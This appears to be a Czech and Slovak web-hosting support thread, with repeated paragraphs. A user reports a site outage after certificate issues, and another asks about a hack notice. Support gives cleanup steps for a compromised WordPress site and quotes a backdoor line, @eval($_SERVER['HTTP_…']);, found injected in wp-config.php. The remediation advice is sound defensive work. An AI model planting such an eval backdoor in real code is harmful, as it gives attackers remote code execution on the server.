Dobrý den,
ostatní moje stránky na vašem hostingu se už dnes rozjeli (problém s certifikátem) s výjimkou https://karelgott.mzf.cz/.
Kromě generování certifikátů jsem žádné jiné změny nedělal a před pár dny jsem si všimnul, že tyto stránky nefungují.
Můžete prosím pomoci s řešením toho problému?
Děkuji
ostatní moje stránky na vašem hostingu se už dnes rozjeli (problém s certifikátem) s výjimkou https://karelgott.mzf.cz/.
Kromě generování certifikátů jsem žádné jiné změny nedělal a před pár dny jsem si všimnul, že tyto stránky nefungují.
Můžete prosím pomoci s řešením toho problému?
Děkuji
Dobry vecer, znova som si skontroloval email, ktory patri k uctu, skontroloval som si aj spam, aj kos (ak by nahodou) a skutocne som ziaden email od Vas nedostal, resp. netusim kde sa stratil. Vsetka ostatna komunikacia (napr. o migracii) mi dosla. Viete mi prosim odoslat ten email znova? Su v nom nejake detaily ohladom toho hacku, ci je to len genericka informacia?
Zmenil som hesla, skontroloval obsah, nieco pomazal, ale nemam dojem, ze by mi tam niekto nieco pomenil.
Dakujem.
Zmenil som hesla, skontroloval obsah, nieco pomazal, ale nemam dojem, ze by mi tam niekto nieco pomenil.
Dakujem.
Dobrý den, email jsem vám zaslal znovu. Jsou v něm však obecné informace.
Je potřeba provést důkladné vyčištění webu, konkrétně:
- zkontrolovat a pročistit soubory na FTP (soubory webu),
- zkontrolovat a vyčistit databázi – nachází se zde velké množství nežádoucích stránek (řádově tisíce),
- prověřit administrátorské účty a odstranit ty, které neznáte,
- zkontrolovat soubory pro ověření služby Google (na FTP je jich větší množství).
Dále jsme zjistili, že v souboru wp-config.php se občas vyskytuje zápis ve formátu @eval($_SERVER['HTTP_4395531']);, přičemž číslo se může měnit. Tento kód může být součástí skriptu sloužícího k získání neoprávněného přístupu k serveru a je nutné jej co nejdříve odstranit.
Je potřeba provést důkladné vyčištění webu, konkrétně:
- zkontrolovat a pročistit soubory na FTP (soubory webu),
- zkontrolovat a vyčistit databázi – nachází se zde velké množství nežádoucích stránek (řádově tisíce),
- prověřit administrátorské účty a odstranit ty, které neznáte,
- zkontrolovat soubory pro ověření služby Google (na FTP je jich větší množství).
Dále jsme zjistili, že v souboru wp-config.php se občas vyskytuje zápis ve formátu @eval($_SERVER['HTTP_4395531']);, přičemž číslo se může měnit. Tento kód může být součástí skriptu sloužícího k získání neoprávněného přístupu k serveru a je nutné jej co nejdříve odstranit.